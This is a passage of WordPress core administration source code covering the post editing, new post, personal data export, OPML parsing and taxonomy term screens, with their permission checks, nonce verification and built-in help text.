'time_format' ) ) . '" class="small-text" />' . '<br />' . '<p><strong>' . __( 'Preview:' ) . '</strong> <span class="example">' . date_i18n( get_option( 'time_format' ) ) . '</span>' . "<span class='spinner'></span>\n" . '</p>'; echo "\t<p class='date-time-doc'>" . __( '<a href="https://wordpress.org/documentation/article/customize-date-and-time-format/">Documentation on date and time formatting</a>.' ) . "</p>\n"; ?> </fieldset> </td> </tr> <tr> <th scope="row"><label for="start_of_week"><?php _e( 'Week Starts On' ); ?></label></th> <td><select name="start_of_week" id="start_of_week"> <?php /** * @global WP_Locale $wp_locale WordPress date and time locale object. */ global $wp_locale; for ( $day_index = 0; $day_index <= 6; $day_index++ ) : $selected = ( (int) get_option( 'start_of_week' ) === $day_index ) ? 'selected="selected"' : ''; echo "\n\t<option value='" . esc_attr( $day_index ) . "' $selected>" . $wp_locale->get_weekday( $day_index ) . '</option>'; endfor; ?> </select></td> </tr> <?php do_settings_fields( 'general', 'default' ); ?> </table> <?php do_settings_sections( 'general' ); ?> <?php submit_button(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> <?php /** * Edit post administration panel. * * Manage Post actions: post, edit, delete, etc. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $parent_file = 'edit.php'; $submenu_file = 'edit.php'; $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; if ( isset( $_GET['post'] ) && isset( $_POST['post_ID'] ) && (int) $_GET['post'] !== (int) $_POST['post_ID'] ) { wp_die( __( 'A post ID mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 ); } elseif ( isset( $_GET['post'] ) ) { $post_id = (int) $_GET['post']; } elseif ( isset( $_POST['post_ID'] ) ) { $post_id = (int) $_POST['post_ID']; } else { $post_id = 0; } $post_ID = $post_id; /** * @global string $post_type Global post type. * @global WP_Post_Type $post_type_object Global post type object. * @global WP_Post $post Global post object. */ global $post_type, $post_type_object, $post; if ( $post_id ) { $post = get_post( $post_id ); } if ( $post ) { $post_type = $post->post_type; $post_type_object = get_post_type_object( $post_type ); } if ( isset( $_POST['post_type'] ) && $post && $post_type !== $_POST['post_type'] ) { wp_die( __( 'A post type mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 ); } if ( isset( $_POST['deletepost'] ) ) { $action = 'delete'; } elseif ( isset( $_POST['wp-preview'] ) && 'dopreview' === $_POST['wp-preview'] ) { $action = 'preview'; } $sendback = wp_get_referer(); if ( ! $sendback || str_contains( $sendback, 'post.php' ) || str_contains( $sendback, 'post-new.php' ) ) { if ( 'attachment' === $post_type ) { $sendback = admin_url( 'upload.php' ); } else { $sendback = admin_url( 'edit.php' ); if ( ! empty( $post_type ) ) { $sendback = add_query_arg( 'post_type', $post_type, $sendback ); } } } else { $sendback = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'ids' ), $sendback ); } switch ( $action ) { case 'post-quickdraft-save': // Check nonce and capabilities. $nonce = $_REQUEST['_wpnonce']; $error_msg = false; // For output of the Quick Draft dashboard widget. require_once ABSPATH . 'wp-admin/includes/dashboard.php'; if ( ! wp_verify_nonce( $nonce, 'add-post' ) ) { $error_msg = __( 'Unable to submit this form, please refresh and try again.' ); } if ( ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) ) { exit; } if ( $error_msg ) { return wp_dashboard_quick_press( $error_msg ); } $post = get_post( $_REQUEST['post_ID'] ); check_admin_referer( 'add-' . $post->post_type ); $_POST['comment_status'] = get_default_comment_status( $post->post_type ); $_POST['ping_status'] = get_default_comment_status( $post->post_type, 'pingback' ); // Wrap Quick Draft content in the Paragraph block. if ( ! str_contains( $_POST['content'], '<!-- wp:paragraph -->' ) ) { $_POST['content'] = sprintf( '<!-- wp:paragraph -->%s<!-- /wp:paragraph -->', str_replace( array( "\r\n", "\r", "\n" ), '<br />', $_POST['content'] ) ); } edit_post(); wp_dashboard_quick_press(); exit; case 'postajaxpost': case 'post': check_admin_referer( 'add-' . $post_type ); $post_id = 'postajaxpost' === $action ? edit_post() : write_post(); redirect_post( $post_id ); exit; case 'edit': $editing = true; if ( empty( $post_id ) ) { wp_redirect( admin_url( 'post.php' ) ); exit; } if ( ! $post ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ), 404 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! in_array( $typenow, get_post_types( array( 'show_ui' => true ) ), true ) ) { wp_die( __( 'Sorry, you are not allowed to edit posts in this post type.' ), 403 ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to edit this item.' ), 403 ); } if ( 'trash' === $post->post_status ) { wp_die( __( 'You cannot edit this item because it is in the Trash. Please restore it and try again.' ), 409 ); } if ( ! empty( $_GET['get-post-lock'] ) ) { check_admin_referer( 'lock-post_' . $post_id ); wp_set_post_lock( $post_id ); wp_redirect( get_edit_post_link( $post_id, 'url' ) ); exit; } $post_type = $post->post_type; if ( 'post' === $post_type ) { $parent_file = 'edit.php'; $submenu_file = 'edit.php'; $post_new_file = 'post-new.php'; } elseif ( 'attachment' === $post_type ) { $parent_file = 'upload.php'; $submenu_file = 'upload.php'; $post_new_file = 'media-new.php'; } else { if ( $post_type_object->show_in_menu && true !== $post_type_object->show_in_menu ) { $parent_file = $post_type_object->show_in_menu; } else { $parent_file = "edit.php?post_type=$post_type"; } $submenu_file = "edit.php?post_type=$post_type"; $post_new_file = "post-new.php?post_type=$post_type"; } $title = $post_type_object->labels->edit_item; /** * Allows replacement of the editor. * * @since 4.9.0 * * @param bool $replace Whether to replace the editor. Default false. * @param WP_Post $post Post object. */ if ( true === apply_filters( 'replace_editor', false, $post ) ) { break; } if ( use_block_editor_for_post( $post ) ) { require ABSPATH . 'wp-admin/edit-form-blocks.php'; break; } if ( ! wp_check_post_lock( $post->ID ) ) { $active_post_lock = wp_set_post_lock( $post->ID ); if ( 'attachment' !== $post_type ) { wp_enqueue_script( 'autosave' ); } } $post = get_post( $post_id, OBJECT, 'edit' ); if ( post_type_supports( $post_type, 'comments' ) ) { wp_enqueue_script( 'admin-comments' ); enqueue_comment_hotkeys_js(); } require ABSPATH . 'wp-admin/edit-form-advanced.php'; break; case 'editattachment': check_admin_referer( 'update-post_' . $post_id ); // Don't let these be changed. unset( $_POST['guid'] ); $_POST['post_type'] = 'attachment'; // Update the thumbnail filename. $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = wp_basename( $_POST['thumb'] ); wp_update_attachment_metadata( $post_id, $newmeta ); // Intentional fall-through to trigger the edit_post() call. case 'editpost': check_admin_referer( 'update-post_' . $post_id ); $post_id = edit_post(); // Session cookie flag that the post was saved. if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id . '-check' ) { setcookie( 'wp-saving-post', $post_id . '-saved', time() + DAY_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN, is_ssl() ); } redirect_post( $post_id ); // Send user on their way while we keep working. exit; case 'trash': check_admin_referer( 'trash-post_' . $post_id ); if ( ! $post ) { wp_die( __( 'The item you are trying to move to the Trash no longer exists.' ), 410 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to move this item to the Trash.' ), 403 ); } $user_id = wp_check_post_lock( $post_id ); if ( $user_id ) { $user = get_userdata( $user_id ); /* translators: %s: User's display name. */ wp_die( sprintf( __( 'You cannot move this item to the Trash. %s is currently editing.' ), $user->display_name ), 409 ); } if ( ! wp_trash_post( $post_id ) ) { wp_die( __( 'Error in moving the item to Trash.' ), 500 ); } wp_redirect( add_query_arg( array( 'trashed' => 1, 'ids' => $post_id, ), $sendback ) ); exit; case 'untrash': check_admin_referer( 'untrash-post_' . $post_id ); if ( ! $post ) { wp_die( __( 'The item you are trying to restore from the Trash no longer exists.' ), 410 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to restore this item from the Trash.' ), 403 ); } if ( ! wp_untrash_post( $post_id ) ) { wp_die( __( 'Error in restoring the item from Trash.' ), 500 ); } $sendback = add_query_arg( array( 'untrashed' => 1, 'ids' => $post_id, ), $sendback ); wp_redirect( $sendback ); exit; case 'delete': check_admin_referer( 'delete-post_' . $post_id ); if ( ! $post ) { wp_die( __( 'This item has already been deleted.' ), 410 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to delete this item.' ), 403 ); } if ( 'attachment' === $post->post_type ) { $force = ( ! MEDIA_TRASH ); if ( ! wp_delete_attachment( $post_id, $force ) ) { wp_die( __( 'Error in deleting the attachment.' ), 500 ); } } else { if ( ! wp_delete_post( $post_id, true ) ) { wp_die( __( 'Error in deleting the item.' ), 500 ); } } wp_redirect( add_query_arg( 'deleted', 1, $sendback ) ); exit; case 'preview': check_admin_referer( 'update-post_' . $post_id ); $url = post_preview(); wp_redirect( $url ); exit; case 'toggle-custom-fields': check_admin_referer( 'toggle-custom-fields', 'toggle-custom-fields-nonce' ); $current_user_id = get_current_user_id(); if ( $current_user_id ) { $enable_custom_fields = (bool) get_user_meta( $current_user_id, 'enable_custom_fields', true ); update_user_meta( $current_user_id, 'enable_custom_fields', ! $enable_custom_fields ); } wp_safe_redirect( wp_get_referer() ); exit; default: /** * Fires for a given custom post action request. * * The dynamic portion of the hook name, `$action`, refers to the custom post action. * * @since 4.6.0 * * @param int $post_id Post ID sent with the request. */ do_action( "post_action_{$action}", $post_id ); wp_redirect( admin_url( 'edit.php' ) ); exit; } // End switch. require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Privacy tools, Export Personal Data screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'export_others_personal_data' ) ) { wp_die( __( 'Sorry, you are not allowed to export personal data on this site.' ) ); } // Used in the HTML title tag. $title = __( 'Export Personal Data' ); // Contextual help - choose Help on the top right of admin panel to preview this. get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen is where you manage requests for an export of personal data.' ) . '</p>' . '<p>' . __( 'Privacy Laws around the world require businesses and online services to provide an export of some of the data they collect about an individual, and to deliver that export on request. The rights those laws enshrine are sometimes called the "Right of Data Portability". It allows individuals to obtain and reuse their personal data for their own purposes across different services. It allows them to move, copy or transfer personal data easily from one IT environment to another.' ) . '</p>' . '<p>' . __( 'The tool associates data stored in WordPress with a supplied email address, including profile data and comments.' ) . '</p>' . '<p><strong>' . __( 'Note: Since this tool only gathers data from WordPress and participating plugins, you may need to do more to comply with export requests. For example, you should also send the requester some of the data collected from or stored with the 3rd party services your organization uses.' ) . '</strong></p>', ) ); get_current_screen()->add_help_tab( array( 'id' => 'default-data', 'title' => __( 'Default Data' ), 'content' => '<p>' . __( 'WordPress collects (but <em>never</em> publishes) a limited amount of data from registered users who have logged in to the site. Generally, these users are people who contribute to the site in some way -- content, store management, and so on. With rare exceptions, these users do not include occasional visitors who might have registered to comment on articles or buy products. The data WordPress retains can include:' ) . '</p>' . '<p>' . __( '<strong>Profile Information</strong> — user email address, username, display name, nickname, first name, last name, description/bio, and registration date.' ) . '</p>' . '<p>' . __( '<strong>Community Events Location</strong> — The IP Address of the user, which populates the Upcoming Community Events dashboard widget with relevant information.' ) . '</p>' . '<p>' . __( '<strong>Session Tokens</strong> — User login information, IP Addresses, Expiration Date, User Agent (Browser/OS), and Last Login.' ) . '</p>' . '<p>' . __( '<strong>Comments</strong> — For user comments, Email Address, IP Address, User Agent (Browser/OS), Date/Time, Comment Content, and Content URL.' ) . '</p>' . '<p>' . __( '<strong>Media</strong> — A list of URLs for media files the user uploads.' ) . '</p>', ) ); $privacy_policy_guide = '<p>' . sprintf( /* translators: %s: URL to Privacy Policy Guide screen. */ __( 'If you are not sure, check the plugin documentation or contact the plugin author to see if the plugin collects data and if it supports the Data Exporter tool. This information may be available in the <a href="%s">Privacy Policy Guide</a>.' ), admin_url( 'options-privacy.php?tab=policyguide' ) ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'plugin-data', 'title' => __( 'Plugin Data' ), 'content' => '<p>' . __( 'Many plugins may collect or store personal data either in the WordPress database or remotely. Any Export Personal Data request should include data from plugins as well.' ) . '</p>' . $privacy_policy_guide . '<p>' . __( 'If you are a plugin author, you can learn more about <a href="https://developer.wordpress.org/plugins/privacy/adding-the-personal-data-exporter-to-your-plugin/">how to add the Personal Data Exporter to a plugin</a>.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-export-personal-data-screen/">Documentation on Export Personal Data</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); // Handle list table actions. _wp_personal_data_handle_actions(); // Cleans up failed and expired requests before displaying the list table. _wp_personal_data_cleanup_requests(); wp_enqueue_script( 'privacy-tools' ); add_screen_option( 'per_page', array( 'default' => 20, 'option' => 'export_personal_data_requests_per_page', ) ); $_list_table_args = array( 'plural' => 'privacy_requests', 'singular' => 'privacy_request', ); $requests_table = _get_list_table( 'WP_Privacy_Data_Export_Requests_List_Table', $_list_table_args ); $requests_table->screen->set_screen_reader_content( array( 'heading_views' => __( 'Filter export personal data list' ), 'heading_pagination' => __( 'Export personal data list navigation' ), 'heading_list' => __( 'Export personal data list' ), ) ); $requests_table->process_bulk_action(); $requests_table->prepare_items(); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap nosubsub"> <h1><?php esc_html_e( 'Export Personal Data' ); ?></h1> <p><?php _e( 'This tool helps site owners comply with local laws and regulations by exporting known data for a given user in a .zip file.' ); ?></p> <hr class="wp-header-end" /> <?php settings_errors(); ?> <form action="<?php echo esc_url( admin_url( 'export-personal-data.php' ) ); ?>" method="post" class="wp-privacy-request-form"> <h2><?php esc_html_e( 'Add Data Export Request' ); ?></h2> <div class="wp-privacy-request-form-field"> <table class="form-table"> <tr> <th scope="row"> <label for="username_or_email_for_privacy_request"><?php esc_html_e( 'Username or email address' ); ?></label> </th> <td> <input type="text" required class="regular-text ltr" id="username_or_email_for_privacy_request" name="username_or_email_for_privacy_request" /> </td> </tr> <tr> <th scope="row"> <?php _e( 'Confirmation email' ); ?> </th> <td> <label for="send_confirmation_email"> <input type="checkbox" name="send_confirmation_email" id="send_confirmation_email" value="1" checked="checked" /> <?php _e( 'Send personal data export confirmation email.' ); ?> </label> </td> </tr> </table> <p class="submit"> <?php submit_button( __( 'Send Request' ), 'secondary', 'submit', false ); ?> </p> </div> <?php wp_nonce_field( 'personal-data-request' ); ?> <input type="hidden" name="action" value="add_export_personal_data_request" /> <input type="hidden" name="type_of_action" value="export_personal_data" /> </form> <hr /> <?php $requests_table->views(); ?> <form class="search-form wp-clearfix"> <?php $requests_table->search_box( __( 'Search Requests' ), 'requests' ); ?> <input type="hidden" name="filter-status" value="<?php echo isset( $_REQUEST['filter-status'] ) ? esc_attr( sanitize_text_field( $_REQUEST['filter-status'] ) ) : ''; ?>" /> <input type="hidden" name="orderby" value="<?php echo isset( $_REQUEST['orderby'] ) ? esc_attr( sanitize_text_field( $_REQUEST['orderby'] ) ) : ''; ?>" /> <input type="hidden" name="order" value="<?php echo isset( $_REQUEST['order'] ) ? esc_attr( sanitize_text_field( $_REQUEST['order'] ) ) : ''; ?>" /> </form> <form method="post"> <?php $requests_table->display(); $requests_table->embed_scripts(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Parse OPML XML files and store in globals. * * @package WordPress * @subpackage Administration */ if ( ! defined( 'ABSPATH' ) ) { die(); } /** * @global string $opml */ global $opml; /** * Starts a new XML tag. * * Callback function for xml_set_element_handler(). * * @since 0.71 * @access private * * @global array $names * @global array $urls * @global array $targets * @global array $descriptions * @global array $feeds * * @param resource $parser XML Parser resource. * @param string $tag_name XML element name. * @param array $attrs XML element attributes. */ function startElement( $parser, $tag_name, $attrs ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid global $names, $urls, $targets, $descriptions, $feeds; if ( 'OUTLINE' === $tag_name ) { $name = ''; if ( isset( $attrs['TEXT'] ) ) { $name = $attrs['TEXT']; } if ( isset( $attrs['TITLE'] ) ) { $name = $attrs['TITLE']; } $url = ''; if ( isset( $attrs['URL'] ) ) { $url = $attrs['URL']; } if ( isset( $attrs['HTMLURL'] ) ) { $url = $attrs['HTMLURL']; } // Save the data away. $names[] = $name; $urls[] = $url; $targets[] = $attrs['TARGET'] ?? ''; $feeds[] = $attrs['XMLURL'] ?? ''; $descriptions[] = $attrs['DESCRIPTION'] ?? ''; } // End if outline. } /** * Ends a new XML tag. * * Callback function for xml_set_element_handler(). * * @since 0.71 * @access private * * @param resource $parser XML Parser resource. * @param string $tag_name XML tag name. */ function endElement( $parser, $tag_name ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid // Nothing to do. } // Create an XML parser. if ( ! function_exists( 'xml_parser_create' ) ) { wp_trigger_error( '', __( "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." ) ); wp_die( __( "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." ) ); } $xml_parser = xml_parser_create(); // Set the functions to handle opening and closing tags. xml_set_element_handler( $xml_parser, 'startElement', 'endElement' ); if ( ! xml_parse( $xml_parser, $opml, true ) ) { printf( /* translators: 1: Error message, 2: Line number. */ __( 'XML Error: %1$s at line %2$s' ), xml_error_string( xml_get_error_code( $xml_parser ) ), xml_get_current_line_number( $xml_parser ) ); } if ( PHP_VERSION_ID < 80000 ) { // xml_parser_free() has no effect as of PHP 8.0. // Free up memory used by the XML parser. xml_parser_free( $xml_parser ); } unset( $xml_parser ); <?php /** * New Post Administration Screen. * * @package WordPress * @subpackage Administration */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; /** * @global string $post_type Global post type. * @global WP_Post_Type $post_type_object Global post type object. * @global WP_Post $post Global post object. */ global $post_type, $post_type_object, $post; if ( ! isset( $_GET['post_type'] ) ) { $post_type = 'post'; } elseif ( in_array( $_GET['post_type'], get_post_types( array( 'show_ui' => true ) ), true ) ) { $post_type = $_GET['post_type']; } else { wp_die( __( 'Invalid post type.' ) ); } $post_type_object = get_post_type_object( $post_type ); if ( 'post' === $post_type ) { $parent_file = 'edit.php'; $submenu_file = 'post-new.php'; } elseif ( 'attachment' === $post_type ) { if ( wp_redirect( admin_url( 'media-new.php' ) ) ) { exit; } } else { $submenu_file = "post-new.php?post_type=$post_type"; if ( isset( $post_type_object ) && $post_type_object->show_in_menu && true !== $post_type_object->show_in_menu ) { $parent_file = $post_type_object->show_in_menu; // What if there isn't a post-new.php item for this post type? if ( ! isset( $_registered_pages[ get_plugin_page_hookname( "post-new.php?post_type=$post_type", $post_type_object->show_in_menu ) ] ) ) { if ( isset( $_registered_pages[ get_plugin_page_hookname( "edit.php?post_type=$post_type", $post_type_object->show_in_menu ) ] ) ) { // Fall back to edit.php for that post type, if it exists. $submenu_file = "edit.php?post_type=$post_type"; } else { // Otherwise, give up and highlight the parent. $submenu_file = $parent_file; } } } else { $parent_file = "edit.php?post_type=$post_type"; } } $title = $post_type_object->labels->add_new_item; $editing = true; if ( ! current_user_can( $post_type_object->cap->edit_posts ) || ! current_user_can( $post_type_object->cap->create_posts ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to create posts as this user.' ) . '</p>', 403 ); } $post = get_default_post_to_edit( $post_type, true ); $post_ID = $post->ID; /** This filter is documented in wp-admin/post.php */ if ( apply_filters( 'replace_editor', false, $post ) !== true ) { if ( use_block_editor_for_post( $post ) ) { require ABSPATH . 'wp-admin/edit-form-blocks.php'; } else { wp_enqueue_script( 'autosave' ); require ABSPATH . 'wp-admin/edit-form-advanced.php'; } } else { // Flag that we're not loading the block editor. $current_screen = get_current_screen(); $current_screen->is_block_editor( false ); } require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Edit Tags Administration Screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! $taxnow ) { wp_die( __( 'Invalid taxonomy.' ) ); } $tax = get_taxonomy( $taxnow ); if ( ! $tax ) { wp_die( __( 'Invalid taxonomy.' ) ); } if ( ! in_array( $tax->name, get_taxonomies( array( 'show_ui' => true ) ), true ) ) { wp_die( __( 'Sorry, you are not allowed to edit terms in this taxonomy.' ) ); } if ( ! current_user_can( $tax->cap->manage_terms ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to manage terms in this taxonomy.' ) . '</p>', 403 ); } /** * $post_type is set when the WP_Terms_List_Table instance is created. * * @global string $post_type Global post type. */ global $post_type; $wp_list_table = _get_list_table( 'WP_Terms_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); $title = $tax->labels->name; if ( 'post' !== $post_type ) { $parent_file = ( 'attachment' === $post_type ) ? 'upload.php' : "edit.php?post_type=$post_type"; $submenu_file = "edit-tags.php?taxonomy=$taxonomy&post_type=$post_type"; } elseif ( 'link_category' === $tax->name ) { $parent_file = 'link-manager.php'; $submenu_file = 'edit-tags.php?taxonomy=link_category'; } else { $parent_file = 'edit.php'; $submenu_file = "edit-tags.php?taxonomy=$taxonomy"; } add_screen_option( 'per_page', array( 'default' => 20, 'option' => 'edit_' . $tax->name . '_per_page', ) ); get_current_screen()->set_screen_reader_content( array( 'heading_pagination' => $tax->labels->items_list_navigation, 'heading_list' => $tax->labels->items_list, ) ); $location = false; $referer = wp_get_referer(); if ( ! $referer ) { // For POST requests. $referer = wp_unslash( $_SERVER['REQUEST_URI'] ); } $referer = remove_query_arg( array( '_wp_http_referer', '_wpnonce', 'error', 'message', 'paged' ), $referer ); switch ( $wp_list_table->current_action() ) { case 'add-tag': check_admin_referer( 'add-tag', '_wpnonce_add-tag' ); if ( ! current_user_can( $tax->cap->edit_terms ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to create terms in this taxonomy.' ) . '</p>', 403 ); } $ret = wp_insert_term( $_POST['tag-name'], $taxonomy, $_POST ); if ( $ret && ! is_wp_error( $ret ) ) { $location = add_query_arg( 'message', 1, $referer ); } else { $location = add_query_arg( array( 'error' => true, 'message' => 4, ), $referer ); } break; case 'delete': if ( ! isset( $_REQUEST['tag_ID'] ) ) { break; } $tag_ID = (int) $_REQUEST['tag_ID']; check_admin_referer( 'delete-tag_' . $tag_ID ); if ( ! current_user_can( 'delete_term', $tag_ID ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to delete this item.' ) . '</p>', 403 ); } wp_delete_term( $tag_ID, $taxonomy ); $location = add_query_arg( 'message', 2, $referer ); // When deleting a term, prevent the action from redirecting back to a term that no longer exists. $location = remove_query_arg( array( 'tag_ID', 'action' ), $location ); break; case 'bulk-delete': check_admin_referer( 'bulk-tags' ); if ( ! current_user_can( $tax->cap->delete_terms ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to delete these items.' ) . '</p>', 403 ); } $tags = (array) $_REQUEST['delete_tags']; foreach ( $tags as $tag_ID ) { wp_delete_term( $tag_ID, $taxonomy ); } $location = add_query_arg( 'message', 6, $referer ); break; case 'edit': if ( ! isset( $_REQUEST['tag_ID'] ) ) { break; } $term_id = (int) $_REQUEST['tag_ID']; $term = get_term( $term_id ); if ( ! $term instanceof WP_Term ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ) ); } wp_redirect( sanitize_url( get_edit_term_link( $term_id, $taxonomy, $post_type ) ) ); exit; case 'editedtag': $tag_ID = (int) $_POST['tag_ID']; check_admin_referer( 'update-tag_' . $tag_ID ); if ( ! current_user_can( 'edit_term', $tag_ID ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to edit this item.' ) . '</p>', 403 ); } $tag = get_term( $tag_ID, $taxonomy ); if ( ! $tag ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ) ); } $ret = wp_update_term( $tag_ID, $taxonomy, $_POST ); if ( $ret && ! is_wp_error( $ret ) ) { $location = add_query_arg( 'message', 3, $referer ); } else { $location = add_query_arg( array( 'error' => true, 'message' => 5, ), $referer ); } break; default: if ( ! $wp_list_table->current_action() || ! isset( $_REQUEST['delete_tags'] ) ) { break; } check_admin_referer( 'bulk-tags' ); $screen = get_current_screen()->id; $tags = (array) $_REQUEST['delete_tags']; /** This action is documented in wp-admin/edit.php */ $location = apply_filters( "handle_bulk_actions-{$screen}", $location, $wp_list_table->current_action(), $tags ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores break; } if ( ! $location && ! empty( $_REQUEST['_wp_http_referer'] ) ) { $location = remove_query_arg( array( '_wp_http_referer', '_wpnonce' ), wp_unslash( $_SERVER['REQUEST_URI'] ) ); } if ( $location ) { if ( $pagenum > 1 ) { $location = add_query_arg( 'paged', $pagenum, $location ); // $pagenum takes care of $total_pages. } if ( 1 === $pagenum ) { $location = remove_query_arg( 'paged', $location ); } /** * Filters the taxonomy redirect destination URL. * * @since 4.6.0 * * @param string $location The destination URL. * @param WP_Taxonomy $tax The taxonomy object. */ wp_redirect( apply_filters( 'redirect_term_location', $location, $tax ) ); exit; } $wp_list_table->prepare_items(); $total_pages = $wp_list_table->get_pagination_arg( 'total_pages' ); if ( $pagenum > $total_pages && $total_pages > 0 ) { wp_redirect( add_query_arg( 'paged', $total_pages ) ); exit; } wp_enqueue_script( 'admin-tags' ); if ( current_user_can( $tax->cap->edit_terms ) ) { wp_enqueue_script( 'inline-edit-tax' ); } if ( 'category' === $taxonomy || 'link_category' === $taxonomy || 'post_tag' === $taxonomy ) { $help = ''; if ( 'category' === $taxonomy ) { $help = '<p>' . sprintf( /* translators: %s: URL to Writing Settings screen. */ __( 'You can use categories to define sections of your site and group related posts. The default category is “Uncategorized” until you change it in your <a href="%s">writing settings</a>.' ), 'options-writing.php' ) . '</p>'; } elseif ( 'link_category' === $taxonomy ) { $help = '<p>' . __( 'You can create groups of links by using Link Categories. Link Category names must be unique and Link Categories are separate from the categories you use for posts.' ) . '</p>'; } else { $help = '<p>' . __( 'You can assign keywords to your posts using <strong>tags</strong>. Unlike categories, tags have no hierarchy, meaning there is no relationship from one tag to another.' ) . '</p>'; } if ( 'link_category' === $taxonomy ) { $help .= '<p>' . __( 'You can delete Link Categories in the Bulk Action pull-down, but that action does not delete the links within the category. Instead, it moves them to the default Link Category.' ) . '</p>'; } else { $help .= '<p>' . __( 'What’s the difference between categories and tags? Normally, tags are ad-hoc keywords that identify important information in your post (names, subjects, etc) that may or may not recur in other posts, while categories are pre-determined sections. If you think of your site like a book, the categories are like the Table of Contents and the tags are like the terms in the index.' ) . '</p>'; } get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $help, ) ); if ( 'category' === $taxonomy || 'post_tag' === $taxonomy ) { if ( 'category' === $taxonomy ) { $help = '<p>' . __( 'When adding a new category on this screen, you’ll fill in the following fields:' ) . '</p>'; } else { $help = '<p>' . __( 'When adding a new tag on this screen, you’ll fill in the following fields:' ) . '</p>'; } $help .= '<ul>' . '<li>' . __( '<strong>Name</strong> — The name is how it appears on your site.' ) . '</li>'; $help .= '<li>' . __( '<strong>Slug</strong> — The “slug” is the URL-friendly version of the name. It is usually all lowercase and contains only letters, numbers, and hyphens.' ) . '</li>'; if ( 'category' === $taxonomy ) { $help .= '<li>' . __( '<strong>Parent</strong> — Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have child categories for Bebop and Big Band. Totally optional. To create a subcategory, just choose another category from the Parent dropdown.' ) . '</li>'; } $help .= '<li>' . __( '<strong>Description</strong> — The description is not prominent by default; however, some themes may display it.' ) . '</li>' . '</ul>' . '<p>' . __( 'You can change the display of this screen using the Screen Options tab to set how many items are displayed per screen and to display/hide columns in the table.' ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'adding-terms', 'title' => 'category' === $taxonomy ? __( 'Adding Categories' ) : __( 'Adding Tags' ), 'content' => $help, ) ); } $help = '<p><strong>' . __( 'For more information:' ) . '</strong></p>'; if ( 'category' === $taxonomy ) { $help .= '<p>' . __( '<a href="https://wordpress.org/documentation/article/posts-categories-screen/">Documentation on Categories</a>' ) . '</p>'; } elseif ( 'link_category' === $taxonomy ) { $help .= '<p>' . __( '<a href="https://codex.wordpress.org/Links_Link_Categories_Screen">Documentation on Link Categories</a>' ) . '</p>'; } else { $help .= '<p>' . __( '<a href="https://wordpress.org/documentation/article/posts-tags-screen/">Documentation on Tags</a>' ) . '</p>'; } $help .= '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>'; get_current_screen()->set_help_sidebar( $help ); unset( $help ); } require_once ABSPATH . 'wp-admin/admin-header.php'; // Also used by the Edit Tag form. require_once ABSPATH . 'wp-admin/includes/edit-tag-messages.php'; if 